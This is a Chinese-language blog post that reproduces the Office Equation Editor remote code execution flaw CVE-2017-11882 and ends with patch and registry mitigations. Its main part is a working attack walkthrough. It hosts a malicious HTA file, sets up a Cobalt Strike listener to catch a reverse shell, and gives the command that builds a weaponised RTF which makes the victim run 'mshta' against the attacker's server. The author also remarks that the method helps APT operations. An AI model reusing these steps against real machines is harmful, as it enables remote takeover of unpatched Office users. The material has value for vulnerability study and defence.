标签:tool ima pac 功能 mac os 脚本 aliyun 客户 组合键
本文记录一下针对CVE-2017-11882的漏洞复现
参考backlion师傅的PDF,记录一下这个过程。
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞POC在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。
将生成的hta文档放入WebServer根目录:http://192.168.3.106/evil.hta
我(Cobalt Strike)本地监听了一个8081端口,用来接收客户端的Shell
webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py
生成rtf文档:
python webdav_exec_CVE-2017-11882.py -u http://192.168.3.106/evil.hta -e "mshta http://192.168.3.106/evil.hta" -o test.rtf
!!! Completed !!!
最后将test.rtf在目标机器上执行 =_=||,其实可以实战的,对于APT的帮助很大
目标机器上执行后,我们可以在Cobalt Strike看到来自客户端的会话
1、微软已经对此漏洞做出了修复。
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补2、由于该公式编辑器已经17年未做更新,可能存在大量安全漏洞,建议在注册表中取消该模块的注册。
reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400标签:tool ima pac 功能 mac os 脚本 aliyun 客户 组合键
原文地址:http://www.cnblogs.com/pshell/p/7875416.html
